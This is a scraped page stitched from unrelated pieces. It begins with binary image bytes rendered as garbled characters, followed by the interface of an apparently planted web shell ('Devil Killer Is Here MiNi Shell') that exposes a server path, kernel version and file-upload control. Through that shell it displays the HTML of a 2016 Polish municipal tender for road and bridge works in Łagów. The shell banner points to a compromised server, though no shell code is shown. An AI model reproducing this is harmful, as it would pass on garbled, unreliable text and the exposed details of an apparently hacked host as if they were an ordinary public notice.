JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160413/86506-N-2016.html

<p class="kh_header"><b>Łagów: Rozwój infrastruktury drogowej na terenie gminy poprzez realizację nw. zadań:
Zadanie 1: Przebudowa drogi gminnej Wola Łagowska- Pustka, 
Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna, 
Zadanie 3: Remont drogi Radostów- Choiny</b><br>
<b>Numer ogłoszenia: 86506 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łagów , ul. Rynek 62, 26-025 Łagów, woj. świętokrzyskie, tel. 41 343 70 54, faks 41 343 70 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lagowgmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwój infrastruktury drogowej na terenie gminy poprzez realizację nw. zadań:
Zadanie 1: Przebudowa drogi gminnej Wola Łagowska- Pustka, 
Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna, 
Zadanie 3: Remont drogi Radostów- Choiny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	W ramach przedmiotu zamówienia zostanie wykonana przebudowa drogi gminnej Wola Łagowska- Pustka, budowa most w ciągu drogi gminnej Nowy Staw- Winna oraz wykonany remont drogi Radostów- Choiny.  W wyniku realizacji projektu nastąpi poprawa dostępności komunikacyjnej terenów gminy Łagów, przeciwdziałanie marginalizacji społecznej i ekonomicznej obszarów wiejskich. Polepsza się parametry technicznych dróg oraz  integralności sieci drogowej na terenie gminy a także z innymi jednostkami samorządu terytorialnego.
2.	W ramach realizacji przedmiotu zamówienia zostanie wykonane:
Zadanie 1: Przebudowa drogi gminnej Wola Łagowska- Pustka 
Przebudowa drogi obejmuje wykonanie nawierzchni asfaltowej na długości 640 m o szerokości 5,0 m i obustronnych poboczach 0,5 m, a szczególności:
- wykonanie warstwy odsączającej z piasku gr. 20 cm,
- wykonanie podbudowy kamiennej kruszywem niezwiązanym o gr. 20 cm, 
- wzmocnienie istniejącej podbudowy tłuczniowej warstwa kruszywa gr. 15 cm, 
- wykonanie warstwy wiążącej z masy mineralno-asfaltowej gr. 4 cm, 
- wykonanie warstwy ścieralnej z masy mineralno-asfaltowej gr. 4 cm, 
- wykonanie poboczy utwardzonych materiałem kamiennym gr. 10 cm o szerokości 0,5 m, 
- odmulenie rowów, 

Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna, 

a)	W ramach zadanie zostanie wykonany most drogowy z obustronnymi dojazdami i infrastrukturą towarzyszącą zlokalizowany w ciągu drogi gminnej Nowy Staw- Winna. Most drogowy o konstrukcji żelbetowej jednoprzęsłowy, fundamentowanie bezpośrednie, stopy żelbetowe, przyczółki żelbetowe, układ nośny w postaci ustroju, płytowego, żelbetowego, balustrady stalowe. Adaptacja niwelety i nawierzchni jezdni na dojazdach wystąpi na odcinku ok. 30 m po obu stronach mostu. Zabezpieczenie nasypów budowlanych przewiduje się poprzez skarpy o nachyleniu 1:1 zabezpieczone geokratami obsiane trawą. Zabezpieczenie stożków mostu, betonowane bezpośrednio na budowie. Odprowadzenie wód opadowych- poprzez system spadków poprzecznych i podłużnych oraz odwodnienie liniowe do rowów przydrożnych, a następnie odprowadzone zostaną do rzeki. Regulacja i pogłębienie koryta rzeki przeprowadzona zostanie na odcinku 20 m powyżej i poniżej istniejącego mostu. Po wykonaniu robót ziemnych przewiduje się zabezpieczenia brzegów i dna rzeki materiałami naturalnymi w postaci narzutów. Obiekt jedno jezdniowy o jednym pasie ruchu nawiązujący do istniejących parametrów drogi gminnej.
b)	Charakterystyczne parametry techniczne mostu:
- ilość przęseł: jedno przęsło, 
- długość konstrukcyjna przęsła: 13,50 m, 
- długość całkowita mostu, 23,40 m, 
-szerokość użytkowa mostu: 4,50 m, 
- szerokość całkowita 6,25 m, 
 - światło pionowe 1,75-1,9 m, 
-światło poziome: 12,90 m
c) Ramowy zakres robót budowlanych obejmuje:
- przygotowanie i zabezpieczenie terenu budowy, 
- frezowanie i utylizacja istniejących warstw asfaltu, 
- roboty rozbiórkowe istniejącej podbudowy drogi, 
- roboty ziemne i zabezpieczające wykopy, 
- roboty fundamentowe- stropy żelbetonowe (podstawy) przyczółków, 
- roboty żelbetonowe konstrukcji nośnych mostu- konstrukcja żelbetonowa przyczółków i płyty mostowej, 
- wykonanie izolacji pionowych i poziomych oraz układu odwodnienia mostu, 
- budowa nasypów wraz z umocnienie dojazdów mostu, 
- budowa konstrukcji drogowych dojazdów, 
 - regulacja i umocnienie koryta rzeki, 
- wykonanie prac wykończeniowych mostu montaż balustrad, malowanie, 
- wykonanie umocnienia stożków, 
- rozbiórka istniejącej kładki, 
- wykonanie prac porządkowych terenu inwestycji, 

Zadanie 3: Remont drogi Radostów- Choiny
Remont drogi obejmuje: wykonanie remontu drogi o nawierzchni asfaltowej szerokości jezdni 3,5 m wraz z poboczami z kruszywa (szerokość poboczy 0,75 m) w km 0+000 do 1+650, a w szczególności:
- profilowanie, ścinanie i zagęszczanie istniejącej nawierzchni, 
- podbudowa z kruszywa 10 cm, 
- warstwa wiążąca z betonu asfaltowego 5 cm,
- warstwa ścieralna z betonu asfaltowego 4 cm, 
Przedmiotowa droga realizowana jest na podstawie porozumienia zawartego pomiędzy Gmina Łagów a Gmina Raków z dnia 01.10.2015r. ( do wglądu w siedzibie Zamawiającego). 

3.	Szczegółową charakterystykę, zakres oraz ilość robót do wykonania określają: specyfikacje techniczne wykonania i odbioru robót, dokumentacja projektowa, stanowiące załącznik do siwz. Przedmiar robót stanowiący załącznik do siwz należy traktować jako element dodatkowy, ułatwiający sporządzenie oferty. 
4.	Zakres prac oraz odpowiedzialność wykonawcy w zakresie objęty proponowana ceną ofertowa obejmuje także: organizację, zabezpieczenie i zagospodarowanie terenu budowy, a po zakończeniu robót doprowadzenie placu budowy do należytego porządku, zorganizowania i przeprowadzenie niezbędnych badań, demontaż obiektów tymczasowych, wywóz ziemi i gruzu na wysypisko i utylizacja odpadów.
5.	Wykonawca zobowiązany jest  wykonać roboty będące przedmiotem zamówienia zgodnie z dokumentacją projektową, specyfikacja techniczna wykonania i odbioru robót, niniejsza siwz oraz obowiązującymi przepisami. 
6.	Przed przystaniem do robót Wykonawca ma obowiązek wykonać projekt tymczasowej organizacji ruchu w oparciu o kolejność wykonywania robót i technologie określona w dokumentacji projektowej oraz po uprzednich uzgodnieniach jego zatwierdzenie.
7.	Wykonawca zobowiązany jest do dokonania wizji lokalnej w terenie oraz zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości robót budowlanych, gdyż wyklucza się możliwość roszczeń wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy.
8.	Na realizacje przedmiotu zamówienia Zamawiający ubiega się o dofinansowanie wniosków o przyznanie pomocy na operacje typu Budowa lub modernizacja dróg lokalnych w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii objętego Programem Rozwoju Obszarów Wiejskich na lata  2014-2020 z udziałem środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich (EFRROW). W związku z powyższym Zamawiający zastrzega sobie możliwość ograniczenia zakresu rzeczowego w przypadku nie uzyskania dofinansowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7, 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia - nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składający ofertę muszą spełnić (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek posiadania wiedzy i doświadczenia, polegający na wykazaniu w okresie ostatnich pięciu laty przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, należytego wykonania, co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości: Zadanie 1: przebudowa drogi gminnej Wola Łagowska- Pustka - o wartości 250.000,00 zł brutto, Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna- 400.000,00 zł, Zadanie 3: Remont drogi Radostów- Choiny-170.000,00 zł wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  
W celu potwierdzenia spełnienia niniejszego warunku wykonawcy zobowiązani są przedłożyć wykaz robót budowlanych, sporządzonych według propozycji stanowiącej załącznik do siwz.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia -  nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.
W przypadku składania ofert na realizację 2 lub 3 zadań, należy zsumować wartość wymaganego doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia - nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia. W celu wykazania dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda sporządzenia oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w odpowiednich specjalnościach, co najmniej 1 osobą posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane -w specjalności drogowej (dla zadania 1 i 3), uprawnienia mostowe w zakresie ubiegania się o realizacje zadania 2 oraz doświadczenie zawodowe w  wykonaniu co najmniej 1  jednej roboty budowlanej w zakresie infrastruktury drogowej dla zadania 1 i 3, a dla zadania 2  w zakresie obiektu inżynierskiego (most, wiadukt, estakada). 
Uwaga!
Zamawiający określając wymogi dla potencjału kadrowego w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz.U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r., Nr 63, poz. 394).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia -  nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia - nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawcy składający ofertę muszą spełnić (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek posiadania wiedzy i doświadczenia, polegający na wykazaniu w okresie ostatnich pięciu laty przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, należytego wykonania, co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości: Zadanie 1: przebudowa drogi gminnej Wola Łagowska- Pustka - o wartości 250.000,00 zł brutto, Zadanie 2: Budowa mostu w ciągu drogi gminnej Nowy Staw- Winna- 400.000,00 zł, Zadanie 3: Remont drogi Radostów- Choiny-170.000,00 zł wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  
W celu potwierdzenia spełnienia niniejszego warunku wykonawcy zobowiązani są przedłożyć wykaz robót budowlanych, sporządzonych według propozycji stanowiącej załącznik do siwz.
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia -  nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony formularz ofertowy- zgodnie ze wzorem stanowiącym załącznik do siwz.
b)	oryginał pełnomocnictwa (pełnomocnictw), jeżeli oferta nie jest podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub gdy z innych wymaganych dokumentów nie wynika upoważnienie do reprezentowania, ewentualnie notarialnie potwierdzona za zgodność kopia pełnomocnictwa.
c)	Jeżeli o zamówienie Wykonawcy ubiegają się wspólnie- dokument potwierdzający ustanowienie przez Wykonawców pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
d) kosztorys w formie uproszczonej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji i rekojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowy zawarte zostały w załączniku do SIWZ.
2.	Zmiana postanowień umowy może być dokonana przez obie strony w formie pisemnej w drodze aneksu do przedmiotowej umowy, pod rygorem nieważności.
3.	Zgodnie z art. 144 ust.1 ustawy Zamawiający dopuszcza możliwość dokonywania istotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonał wyboru oferty.
